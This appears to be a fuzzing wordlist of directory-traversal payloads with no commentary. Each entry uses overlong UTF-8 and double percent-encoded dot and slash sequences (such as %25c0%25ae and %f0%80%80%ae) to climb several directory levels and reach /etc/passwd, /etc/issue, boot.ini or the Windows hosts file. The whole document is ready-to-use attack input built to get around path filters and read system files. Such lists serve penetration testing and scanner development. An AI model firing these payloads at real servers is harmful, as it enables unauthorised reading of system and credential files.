-%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cetc%25c1%259cpasswd -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cetc%25c1%259cissue -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cboot.ini -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cetc%25c1%259cpasswd -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cetc%25c1%259cissue -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cboot.ini -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cetc%25c1%259cpasswd -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cetc%25c1%259cissue -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cboot.ini -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cetc%25c1%259cpasswd -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cetc%25c1%259cissue -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cboot.ini -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%25c0%25ae%25c0%25ae%25c0%25afetc%25c0%25afpasswd -%25c0%25ae%25c0%25ae%25c0%25afetc%25c0%25afissue -%25c0%25ae%25c0%25ae%25c0%25afboot.ini -%25c0%25ae%25c0%25ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afetc%25c0%25afpasswd -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afetc%25c0%25afissue -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afboot.ini -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afetc%25c0%25afpasswd -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afetc%25c0%25afissue -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afboot.ini -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afetc%25c0%25afpasswd -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afetc%25c0%25afissue -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afboot.ini -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afetc%25c0%25afpasswd -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afetc%25c0%25afissue -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afboot.ini -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afetc%25c0%25afpasswd -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afetc%25c0%25afissue -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afboot.ini -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%25c0%25ae%25c0%25ae%f0%80%80%afetc%f0%80%80%afpasswd -%25c0%25ae%25c0%25ae%f0%80%80%afetc%f0%80%80%afissue -%25c0%25ae%25c0%25ae%f0%80%80%afboot.ini -%25c0%25ae%25c0%25ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%afetc%f0%80%80%afpasswd -%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%afetc%f0%80%80%afissue -%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%afboot.ini -%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%afetc%f0%80%80%afpasswd -%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%afetc%f0%80%80%afissue -%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%afboot.ini -%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%afetc%f0%80%80%afpasswd -%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%afetc%f0%80%80%afissue -%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%afboot.ini -%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%afetc%f0%80%80%afpasswd -%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%afetc%f0%80%80%afissue -%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%afboot.ini -%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%afetc%f0%80%80%afpasswd -%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%afetc%f0%80%80%afissue -%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%afboot.ini -%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%af%25c0%25ae%25c0%25ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%25c0%25ae%25c0%25ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%25c0%25ae%25c0%25ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%25c0%25ae%25c0%25ae%f8%80%80%80%afboot.ini -%25c0%25ae%25c0%25ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%afboot.ini -%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%afboot.ini -%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%afboot.ini -%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%afboot.ini -%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%afboot.ini -%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%af%25c0%25ae%25c0%25ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%f0%80%80%ae%f0%80%80%ae/etc/passwd -%f0%80%80%ae%f0%80%80%ae/etc/issue -%f0%80%80%ae%f0%80%80%ae/boot.ini -%f0%80%80%ae%f0%80%80%ae/windows/system32/drivers/etc/hosts -%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/etc/passwd -%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/etc/issue -%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/boot.ini -%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/windows/system32/drivers/etc/hosts -%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/etc/passwd -%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/etc/issue -%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/boot.ini -%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/windows/system32/drivers/etc/hosts -%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/etc/passwd -%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/etc/issue -%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/boot.ini -%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/windows/system32/drivers/etc/hosts -%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/etc/passwd -%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/etc/issue -%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/boot.ini -%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/windows/system32/drivers/etc/hosts -%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/etc/passwd -%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/etc/issue -%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/boot.ini -%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/%f0%80%80%ae%f0%80%80%ae/windows/system32/drivers/etc/hosts -%f0%80%80%ae%f0%80%80%ae\etc\passwd -%f0%80%80%ae%f0%80%80%ae\etc\issue -%f0%80%80%ae%f0%80%80%ae\boot.ini -%f0%80%80%ae%f0%80%80%ae\windows\system32\drivers\etc\hosts -%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\etc\passwd -%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\etc\issue -%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\boot.ini -%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\windows\system32\drivers\etc\hosts -%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\etc\passwd -%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\etc\issue -%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\boot.ini -%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\windows\system32\drivers\etc\hosts -%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\etc\passwd -%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\etc\issue -%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\boot.ini -%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\windows\system32\drivers\etc\hosts -%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\etc\passwd -%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\etc\issue -%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\boot.ini -%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\windows\system32\drivers\etc\hosts -%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\etc\passwd -%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\etc\issue -%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\boot.ini -%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\%f0%80%80%ae%f0%80%80%ae\windows\system32\drivers\etc\hosts -%f0%80%80%ae%f0%80%80%ae%2fetc%2fpasswd -%f0%80%80%ae%f0%80%80%ae%2fetc%2fissue -%f0%80%80%ae%f0%80%80%ae%2fboot.ini -%f0%80%80%ae%f0%80%80%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2fetc%2fpasswd -%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2fetc%2fissue -%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2fboot.ini -%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2fetc%2fpasswd -%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2fetc%2fissue -%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2fboot.ini -%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2fetc%2fpasswd -%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2fetc%2fissue -%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2f%f0%80%80%ae%f0%80%80%ae%2fboot.ini 